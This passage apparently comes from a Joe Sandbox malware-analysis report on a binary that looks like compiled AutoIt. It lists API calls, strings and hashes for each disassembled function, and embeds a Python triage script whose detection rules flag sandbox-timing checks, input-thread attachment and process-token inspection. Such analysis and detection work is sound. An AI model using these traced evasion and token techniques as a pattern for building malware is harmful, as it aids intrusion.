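• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0094ACD3,?,00008000), ref: 0094B0F3
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0094ACD3,?,00008000), ref: 0094B126
Similarity
• API ID: CounterPerformanceQuerySleep
• Opcode ID: 1eccaa258968f780cb998c711c3ed4cb51abc13aa4ee7afc22706c241d0e6de1
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00942DC5
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00942DD6
• GetCurrentThreadId.KERNEL32 ref: 00942DDD
• AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00942DE4
Similarity
• Opcode ID: 482d82fc2d1a954014926f34eba1a0bad468708706c221aabfde6a98da35f7b7
APIs
• GetCurrentThread.KERNEL32 ref: 00941634
• OpenThreadToken.ADVAPI32(00000000,?,?,?,009411D9), ref: 0094163B
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009411D9), ref: 00941648
• OpenProcessToken.ADVAPI32(00000000,?,?,?,009411D9), ref: 0094164F
Similarity
• Opcode ID: a6062547add07b5abd5a1687ebe3db0f7a4f1341b1c78a228133821d707b7347
APIs
  • Part of subcall function 008F9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008F9693
• MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00978887
• LineTo.GDI32(?,?,?), ref: 00978894
Similarity
• Opcode ID: b602c19602a10607185733aa5eda29d07ef79c2583ba919e58263344f6aebd99
"""

API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"                                  # Sleep.KERNEL32
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")     # (args), ref: addr
OPCODE_RE = re.compile(r"^•\s*Opcode ID: (?P<id>[0-9a-f]{64})$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: tuple                     # stack slots as printed; '?' = unresolved
    ref: int                        # call-site address
    subcall: Optional[str] = None   # callee address when the call is indirect


@dataclass
class Record:
    calls: list = field(default_factory=list)
    opcode_id: str = ""

    def direct_apis(self) -> set:
        return {c.api for c in self.calls if c.subcall is None}


def parse_records(text: str) -> list:
    """Start a record at every 'APIs' heading; keep the API and Opcode ID bullets below it."""
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            records.append(Record())
        elif records and (m := API_RE.match(line)):
            args = () if m["args"] is None else tuple(a.strip() for a in m["args"].split(","))
            records[-1].calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), m["sub"]))
        elif records and (m := OPCODE_RE.match(line)):
            records[-1].opcode_id = m["id"]
    return records


# Hand-written rules (this example's assumption, not the sandbox's signatures):
# a rule fires when every listed API is a direct call in the same record.
RULES = {
    "execution-timing": ({"QueryPerformanceCounter", "Sleep"}, "timer read around Sleep"),
    "input-thread-attach": ({"GetWindowThreadProcessId", "AttachThreadInput"},
                            "attaches to another window's input queue"),
    "token-inspection": ({"GetCurrentProcess", "OpenProcessToken"}, "opens own process token"),
}

TOKEN_RIGHTS = {0x1: "TOKEN_ASSIGN_PRIMARY", 0x2: "TOKEN_DUPLICATE", 0x4: "TOKEN_IMPERSONATE",
                0x8: "TOKEN_QUERY", 0x10: "TOKEN_QUERY_SOURCE", 0x20: "TOKEN_ADJUST_PRIVILEGES",
                0x40: "TOKEN_ADJUST_GROUPS", 0x80: "TOKEN_ADJUST_DEFAULT", 0x100: "TOKEN_ADJUST_SESSIONID"}


def decode_token_access(mask: int) -> list:
    """Expand a TOKEN_* access mask into the named rights it contains."""
    return [name for bit, name in sorted(TOKEN_RIGHTS.items()) if mask & bit]


def triage(records: list) -> list:
    findings = []
    for rec in records:
        apis = rec.direct_apis()
        for rule, (needed, why) in RULES.items():
            if not needed <= apis:
                continue
            f = {"rule": rule, "why": why, "opcode_id": rec.opcode_id, "apis": sorted(apis)}
            if rule == "token-inspection":
                # GetCurrentProcess takes no parameters, so the first stack slot printed
                # for it is the value pushed for the next call; this example reads it as
                # OpenProcessToken's DesiredAccess (an inference from the push order).
                gcp = next(c for c in rec.calls if c.api == "GetCurrentProcess")
                if gcp.args and gcp.args[0] != "?":
                    f["token_access"] = decode_token_access(int(gcp.args[0], 16))
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in triage(parse_records(SAMPLE)):
        print(f["rule"], f["opcode_id"][:12], f.get("token_access", ""), sep="  ")
```

The rules are triage hints, not verdicts: the execution-timing rule matches a debugger or sandbox timing check, but it equally matches the timer-calibrated wait a compiled AutoIt runtime performs, and the report header says this binary is likely compiled AutoIt. The Opcode ID carried in each finding is what lets the hit be pivoted to the same function in other reports.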
                                                                    APIs
                                                                    • GetDesktopWindow.USER32 ref: 0093D858
                                                                    • GetDC.USER32(00000000), ref: 0093D862
                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0093D882
                                                                    • ReleaseDC.USER32(?), ref: 0093D8A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    • Opcode ID: 8fd2a1393723c9ec78c76351fbb6b65d32d253f87a08863c8b6b672ff16e36ae
                                                                    • Instruction ID: fda12e957e80e70b8df8c0c2227759c317c82227ce61870a2c81ddbc783396f9
                                                                    • Opcode Fuzzy Hash: 8fd2a1393723c9ec78c76351fbb6b65d32d253f87a08863c8b6b672ff16e36ae
                                                                    • Instruction Fuzzy Hash: 97E01AB2814209DFCF41AFA0D84C66DBBB2FB08310F108409E90AE7250CB389981AF40
                                                                    APIs
                                                                    • GetDesktopWindow.USER32 ref: 0093D86C
                                                                    • GetDC.USER32(00000000), ref: 0093D876
                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0093D882
                                                                    • ReleaseDC.USER32(?), ref: 0093D8A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    • Opcode ID: dab6eba6c0469dc8a4890626019911b84f01462f15f17f22a9113acc2d19873b
                                                                    • Instruction ID: c559f1f0c97df5663053f7695e89fdcce655bc580865f92b5ae9134a4d4c649f
                                                                    • Opcode Fuzzy Hash: dab6eba6c0469dc8a4890626019911b84f01462f15f17f22a9113acc2d19873b
                                                                    • Instruction Fuzzy Hash: B1E01AB2C14209DFCF41AFA0D84C66DBBB1FB08310B108008E90AE7250CB385941AF40
                                                                    APIs
                                                                      • Part of subcall function 008E7620: _wcslen.LIBCMT ref: 008E7625
                                                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00954ED4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Connection_wcslen
                                                                    • String ID: *$LPT
                                                                    • API String ID: 1725874428-3443410124
                                                                    • Opcode ID: 86bf569742cd3aa278ffae48deab8581a4574af6254e399134cc38b432f4d260
                                                                    • Instruction ID: ed6704f8af020ce086634de209385a4d1b35505453d452200a4de5c9d3d47bbe
                                                                    • Opcode Fuzzy Hash: 86bf569742cd3aa278ffae48deab8581a4574af6254e399134cc38b432f4d260
                                                                    • Instruction Fuzzy Hash: 9C916E75A002449FCB54DF59C484EAABBF5BF45308F188099E80A9F3A2C735ED89CB91
                                                                    APIs
                                                                    • __startOneArgErrorHandling.LIBCMT ref: 0090E30D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorHandling__start
                                                                    • String ID: pow
                                                                    • API String ID: 3213639722-2276729525
                                                                    • Opcode ID: b35a94105a0340e4549d8c65f20142554fb09c07a8cdc36d9a3fe1c3cef9461c
                                                                    • Instruction ID: 5b373c766d610ffebcac55fcbe91dc8bfef77637cc8f6f861c5530e6610ef16d
                                                                    • Opcode Fuzzy Hash: b35a94105a0340e4549d8c65f20142554fb09c07a8cdc36d9a3fe1c3cef9461c
                                                                    • Instruction Fuzzy Hash: BA512A71B1C10B9ACB157758D9013B9BBFCAB40740F744DA8E0D5823F9DB348CD1AA86
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #
                                                                    • API String ID: 0-1885708031
                                                                    • Opcode ID: e717ab409d63263ced14d3b7242e01489ef5112a3583adef55ffa00cec999152
                                                                    • Instruction ID: 973763f2554f8c97fb1648ce57f7293ec3b38c2acd34a81b7b2f7fb142acdbb7
                                                                    • Opcode Fuzzy Hash: e717ab409d63263ced14d3b7242e01489ef5112a3583adef55ffa00cec999152
                                                                    • Instruction Fuzzy Hash: 1C51237590424ADFDB25DF38C481ABA7BA8FF56310F244055F992DB2E0E7349D82CB91
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000), ref: 008FF2A2
                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 008FF2BB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemorySleepStatus
                                                                    • String ID: @
                                                                    • API String ID: 2783356886-2766056989
                                                                    • Opcode ID: a0de8d4f6e6bf3c89c06570d08e2ce44dc4cf1151c1d99895cf8f235bd141949
                                                                    • Instruction ID: d781ab6478373b352c4a27999b6b8daa621aac5eae0161118d785a23e9c343e9
                                                                    • Opcode Fuzzy Hash: a0de8d4f6e6bf3c89c06570d08e2ce44dc4cf1151c1d99895cf8f235bd141949
                                                                    • Instruction Fuzzy Hash: 4851787181C7859BD320AF15E886BABBBF8FF85300F81484DF29981195EB718529CB67
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 009657E0
                                                                    • _wcslen.LIBCMT ref: 009657EC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper_wcslen
                                                                    • String ID: CALLARGARRAY
                                                                    • API String ID: 157775604-1150593374
                                                                    • Opcode ID: e1b0aada25b3aea9ac0a35128e55b2ad763019ce3e0d6a635804f65fe2968716
                                                                    • Instruction ID: 388e5d830ebafae5d8ae7d4ba4e53881611308d14f0081fc30e77f6392931b78
                                                                    • Opcode Fuzzy Hash: e1b0aada25b3aea9ac0a35128e55b2ad763019ce3e0d6a635804f65fe2968716
                                                                    • Instruction Fuzzy Hash: 7C41AF71E002099FCB14DFA9C8829FEBBF9FF59324F154069E505A7262E7349D81CB91
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 0095D130
                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0095D13A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CrackInternet_wcslen
                                                                    • String ID: |
                                                                    • API String ID: 596671847-2343686810
                                                                    • Opcode ID: af3bf968825a64c4d3b87f93a774602c91566bcb973c560e3d6934e3ac948d10
                                                                    • Instruction ID: ee19f6cb99d55c74ec4caadf77f065a3201d32480778af38a04809cff5118bae
                                                                    • Opcode Fuzzy Hash: af3bf968825a64c4d3b87f93a774602c91566bcb973c560e3d6934e3ac948d10
                                                                    • Instruction Fuzzy Hash: 5E317E71C01219EBCF15EFA6CC85AEE7FB9FF05340F100059F819A6161EB31AA56CB61
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00973621
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0097365C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$DestroyMove
                                                                    • String ID: static
                                                                    • API String ID: 2139405536-2160076837
                                                                    • Opcode ID: b06e413dec8db997c67e921d2ee9372e078882b7acfa2987c4f39ca557840bc1
                                                                    • Instruction ID: a894cce392cbd657709fe28f5c957bd1646f454138315c3081a8660147533554
                                                                    • Opcode Fuzzy Hash: b06e413dec8db997c67e921d2ee9372e078882b7acfa2987c4f39ca557840bc1
                                                                    • Instruction Fuzzy Hash: 3F318E72210604AADB109F28DC81ABB73ADFF88724F10C619F9A997280DA31AD91D760
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0097461F
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00974634
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: '
                                                                    • API String ID: 3850602802-1997036262
                                                                    • Opcode ID: 0cac043db23c2c72e73aba8fc2a058c65a92df9d202f58b6efbbc4210f1c6c1b
                                                                    • Instruction ID: 0ab93869541a78e1bd1698ec3f806f1aaa150858cee816f650db9bd3fced8f90
                                                                    • Opcode Fuzzy Hash: 0cac043db23c2c72e73aba8fc2a058c65a92df9d202f58b6efbbc4210f1c6c1b
                                                                    • Instruction Fuzzy Hash: 15310775A0130A9FDB14CFA9C991BDA7BB9FF49300F14816AE909AB352D770A941CF90
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0097327C
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00973287
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: Combobox
                                                                    • API String ID: 3850602802-2096851135
                                                                    • Opcode ID: 8458c0fa2514b4be404d456400add8e0490a2c9da2b22649ba05aff9ebad446f
                                                                    • Instruction ID: 33655c99404f258b811704e8d1d04bd6a139038cb1dd7a15d4fb7163d94ccf8c
                                                                    • Opcode Fuzzy Hash: 8458c0fa2514b4be404d456400add8e0490a2c9da2b22649ba05aff9ebad446f
                                                                    • Instruction Fuzzy Hash: 6011B6723041087FEF119E54DC85EBB376EEB99364F10C528F52CA7291D6319D51A760
                                                                    APIs
                                                                      • Part of subcall function 008E600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 008E604C
                                                                      • Part of subcall function 008E600E: GetStockObject.GDI32(00000011), ref: 008E6060
                                                                      • Part of subcall function 008E600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 008E606A
                                                                    • GetWindowRect.USER32(00000000,?), ref: 0097377A
                                                                    • GetSysColor.USER32(00000012), ref: 00973794
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                    • String ID: static
                                                                    • API String ID: 1983116058-2160076837
                                                                    • Opcode ID: 3d322309cd6107134447a701decb1633b2b9a9ef00ff98cd27f686a53ab7fd2e
                                                                    • Instruction ID: 7ee0e9aae89f8c8b732e3312f9f44bc9e96d133dddc713b9d898c5bb5df0f2b5
                                                                    • Opcode Fuzzy Hash: 3d322309cd6107134447a701decb1633b2b9a9ef00ff98cd27f686a53ab7fd2e
                                                                    • Instruction Fuzzy Hash: 781129B2610209AFDB00DFA8CC46EEA7BB8FB09354F008918F959E2250E735E851AB50
                                                                    APIs
                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0095CD7D
                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0095CDA6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$OpenOption
                                                                    • String ID: <local>
                                                                    • API String ID: 942729171-4266983199
                                                                    • Opcode ID: 6d496f61c9775429eca0efd3d2174d23de7414109d4685b9ff801924ba230c16
                                                                    • Instruction ID: f7aa57339800a4275453c02eeff1886c853b9b027bac7691cdfce34228af7d54
                                                                    • Opcode Fuzzy Hash: 6d496f61c9775429eca0efd3d2174d23de7414109d4685b9ff801924ba230c16
                                                                    • Instruction Fuzzy Hash: 4611A3F22157357ED7288A678C45FE7BEBCEB127A5F00462AB909D20C0D6649848D7F0
                                                                    APIs
                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 009734AB
                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009734BA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: LengthMessageSendTextWindow
                                                                    • String ID: edit
                                                                    • API String ID: 2978978980-2167791130
                                                                    • Opcode ID: 2d09b41bc72ba7ae4e4637f6667d33dffe323d88692fc4eee361908d8b7d716e
                                                                    • Instruction ID: 9d694a802690189f7c8c47e1de1d2ae4a717ea5cd0bb424519ac0727c6dbdbaf
                                                                    • Opcode Fuzzy Hash: 2d09b41bc72ba7ae4e4637f6667d33dffe323d88692fc4eee361908d8b7d716e
                                                                    • Instruction Fuzzy Hash: 5E11BF72110108ABEB154F64DC84AAB376EEB55378F50C724FA68931E0C731DC91A750
                                                                    APIs
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                    • CharUpperBuffW.USER32(?,?,?), ref: 00946CB6
                                                                    • _wcslen.LIBCMT ref: 00946CC2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$BuffCharUpper
                                                                    • String ID: STOP
                                                                    • API String ID: 1256254125-2411985666
                                                                    • Opcode ID: df83cde484df009e9f9eff6b6ad5f5d6c324fa9fbe69a5a262efb4c123aeb6e9
                                                                    • Instruction ID: 5d864e1e6771a6bc704d3112a46e84455ed6554b4c36e18f6e5dded219fa167e
                                                                    • Opcode Fuzzy Hash: df83cde484df009e9f9eff6b6ad5f5d6c324fa9fbe69a5a262efb4c123aeb6e9
                                                                    • Instruction Fuzzy Hash: 3F01C072A105278ACB20AFBDDC80DBF77A9FF627187510938E9A2961D0EB31DD40C652
                                                                    APIs
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                      • Part of subcall function 00943CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00943CCA
                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00941D4C
                                                                    Strings
